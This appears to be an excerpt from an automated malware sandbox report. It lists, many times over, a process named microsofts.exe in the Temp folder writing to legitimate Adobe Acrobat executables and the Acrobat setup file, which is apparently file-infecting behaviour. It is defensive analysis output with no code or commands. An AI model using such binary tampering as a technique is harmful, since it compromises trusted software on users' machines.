Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
